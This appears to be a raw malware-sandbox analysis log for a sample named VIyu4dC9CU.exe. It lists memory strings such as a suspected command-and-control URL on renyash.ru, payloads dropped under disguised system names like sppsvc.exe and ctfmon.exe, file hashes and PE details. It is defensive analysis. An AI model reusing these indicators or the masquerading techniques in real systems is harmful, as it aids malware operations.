charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Source: sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.reP
Source: sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.reny
Source: ctfmon.exe, 00000013.00000002.1434517775.0000000002C18000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.0000000002DDE000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000315D000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000377E000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002EB3000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000386E000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000324F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.renyash.ru
Source: sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.renyash.ru/
Source: ctfmon.exe, 00000013.00000002.1434517775.0000000002C18000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000315D000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.00000000035B8000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002CED000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000324F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.00000000036A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.renyash.ru/lineSecureUpdateprocessdefaultTestPublicUploadsTemporary.php
Source: VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002EB3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://480344cm.renyash.rupI
Source: VIyu4dC9CU.exe, 00000000.00000002.1296943431.000000000370D000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.0000000002BA7000.00000004.00000800.00020000.00000000.sdmp, ctfmon.exe, 00000013.00000002.1434517775.00000000031C6000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000015.00000002.1456851431.000000000343A000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000315D000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 0000001E.00000002.1501700646.000000000351B000.00000004.00000800.00020000.00000000.sdmp, TDdwNhXdQzDImnznNSm.exe, 00000023.00000002.1541549373.0000000002C5A000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002B.00000002.1721105764.0000000003674000.00000004.00000800.00020000.00000000.sdmp, VIyu4dC9CU.exe, 0000002F.00000002.1774822275.0000000002C4F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000034.00000002.1812150315.000000000394A000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000324F000.00000004.00000800.00020000.00000000.sdmp, sppsvc.exe, 00000038.00000002.1869476937.000000000360B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: c:\Windows\System32\SecurityHealthSystray.exe			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

File deleted: C:\Windows\System32\CSCF1A5C7715E64605B8685523D04CDF88.TMP

Jump to behavior

Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAAC7B0D47	0_2_00007FFAAC7B0D47
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 0_2_00007FFAAC7B0E43	0_2_00007FFAAC7B0E43
Source: C:\Recovery\ctfmon.exe	Code function: 19_2_00007FFAAC7D0D47	19_2_00007FFAAC7D0D47
Source: C:\Recovery\ctfmon.exe	Code function: 19_2_00007FFAAC7D0E43	19_2_00007FFAAC7D0E43
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7B0D47	21_2_00007FFAAC7B0D47
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7B0E43	21_2_00007FFAAC7B0E43
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7B9236	21_2_00007FFAAC7B9236
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7B88B7	21_2_00007FFAAC7B88B7
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC800555	21_2_00007FFAAC800555
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7E1065	21_2_00007FFAAC7E1065
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7ED8E5	21_2_00007FFAAC7ED8E5
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAAC7ED312	21_2_00007FFAAC7ED312
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 21_2_00007FFAACBB977F	21_2_00007FFAACBB977F
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC7D9236	35_2_00007FFAAC7D9236
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC7D88B7	35_2_00007FFAAC7D88B7
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC820555	35_2_00007FFAAC820555
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC801065	35_2_00007FFAAC801065
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC80D8E5	35_2_00007FFAAC80D8E5
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC80D312	35_2_00007FFAAC80D312
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC7D0D47	35_2_00007FFAAC7D0D47
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAAC7D0E43	35_2_00007FFAAC7D0E43
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 35_2_00007FFAACBD977F	35_2_00007FFAACBD977F
Source: C:\Recovery\ctfmon.exe	Code function: 36_2_00007FFAAC7C0D47	36_2_00007FFAAC7C0D47
Source: C:\Recovery\ctfmon.exe	Code function: 36_2_00007FFAAC7C0E43	36_2_00007FFAAC7C0E43
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7FD312	40_2_00007FFAAC7FD312
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7F1065	40_2_00007FFAAC7F1065
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7C0D47	40_2_00007FFAAC7C0D47
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7C0E43	40_2_00007FFAAC7C0E43
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7C9236	40_2_00007FFAAC7C9236
Source: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe	Code function: 40_2_00007FFAAC7C88B7	40_2_00007FFAAC7C88B7
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7CD312	41_2_00007FFAAC7CD312
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7C1065	41_2_00007FFAAC7C1065
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7996AC	41_2_00007FFAAC7996AC
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 41_2_00007FFAAC7988B7	41_2_00007FFAAC7988B7
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7C9236	42_2_00007FFAAC7C9236
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7C88B7	42_2_00007FFAAC7C88B7
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7C0D47	42_2_00007FFAAC7C0D47
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7C0E43	42_2_00007FFAAC7C0E43
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7FD312	42_2_00007FFAAC7FD312
Source: C:\Recovery\ctfmon.exe	Code function: 42_2_00007FFAAC7F1065	42_2_00007FFAAC7F1065
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 43_2_00007FFAAC7A0D47	43_2_00007FFAAC7A0D47
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 43_2_00007FFAAC7A0E43	43_2_00007FFAAC7A0E43
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 43_2_00007FFAACBA977F	43_2_00007FFAACBA977F
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC799236	47_2_00007FFAAC799236
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC7988B7	47_2_00007FFAAC7988B7
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC7E0555	47_2_00007FFAAC7E0555
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC7C1065	47_2_00007FFAAC7C1065
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC7CD8E5	47_2_00007FFAAC7CD8E5
Source: C:\Users\user\Desktop\VIyu4dC9CU.exe	Code function: 47_2_00007FFAAC7CD312	47_2_00007FFAAC7CD312
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC7D0D47	52_2_00007FFAAC7D0D47
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC7D0E43	52_2_00007FFAAC7D0E43
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC7D9236	52_2_00007FFAAC7D9236
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC7D88B7	52_2_00007FFAAC7D88B7
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC820555	52_2_00007FFAAC820555
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC801065	52_2_00007FFAAC801065
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC80D8E5	52_2_00007FFAAC80D8E5
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAAC80D312	52_2_00007FFAAC80D312
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 52_2_00007FFAACBD977F	52_2_00007FFAACBD977F
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7C9236	56_2_00007FFAAC7C9236
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7C88B7	56_2_00007FFAAC7C88B7
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7C0D47	56_2_00007FFAAC7C0D47
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7C0E43	56_2_00007FFAAC7C0E43
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC810555	56_2_00007FFAAC810555
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7F1065	56_2_00007FFAAC7F1065
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7FD8E5	56_2_00007FFAAC7FD8E5
Source: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe	Code function: 56_2_00007FFAAC7FD312	56_2_00007FFAAC7FD312

Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\MSECache\TDdwNhXdQzDImnznNSm.exe 26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D
Source: Joe Sandbox View	Dropped File: C:\Program Files (x86)\Reference Assemblies\sppsvc.exe 26BDA6E083DB3A3C3CCAF29434850D91BBB9E10C48886A6F6A06BBF6C183448D

Source: lHNctDZP.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OsAnoSoB.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: yqvjUPym.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: oHbTlmtF.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mwFSlUNE.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eTxcBbyX.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: VponRhip.log.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zupqWouz.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: sNIJIutM.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: aGreoIOy.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RYXOEfJQ.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IuPYVmtj.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: HpEyVDEi.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: zLwIlJoB.log.19.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vnARymaC.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fdKvAzJi.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UpgEQnOA.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: CdEzwRtl.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: NJzXBuON.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: EfqhSByg.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: mTPcyfdR.log.21.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: koiTwEAQ.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: kxFTgqTN.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: BeMjthTj.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: qqitJWYB.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gHPdZtTT.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XYvNpROm.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: OvnXGXyF.log.30.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pRAsNhes.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vbkkEjci.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: AOCihfsW.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: tngbTVgk.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: kEMLjtbD.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: bbEWzzMV.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: ZQiVzhgV.log.35.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MegGnYKL.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vPfJpCEr.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eIOeVPZc.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: VeGplWJv.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MwnZBuEN.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: IFwiuxEU.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: WWWWHnjp.log.43.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: swusCNgs.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: QKWXiCZs.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: gmTMvKjO.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PfChbXEz.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: wSacHBjk.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: njHMYZdD.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: UXfGEDIo.log.47.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: FUcZRGSD.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: yFCKRiMT.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: nRXThXRl.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: eoPexdBD.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: MbnYeHgo.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DtUIufbH.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: uPLTKmLa.log.52.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: pDLUlABc.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: XwvpSNWN.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: vmRteunU.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: DhgBcIwD.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: jLivJUwn.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: PtwPpPmY.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: xhUJVuRJ.log.56.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: VIyu4dC9CU.exe, 00000000.00000000.1241305685.0000000000F92000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VIyu4dC9CU.exe
Source: VIyu4dC9CU.exe, 0000002B.00000002.1696189732.0000000001248000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs VIyu4dC9CU.exe
Source: VIyu4dC9CU.exe	Binary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs VIyu4dC9CU.exe

Source: VIyu4dC9CU.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: VIyu4dC9CU.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TDdwNhXdQzDImnznNSm.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ctfmon.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: TDdwNhXdQzDImnznNSm.exe0.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
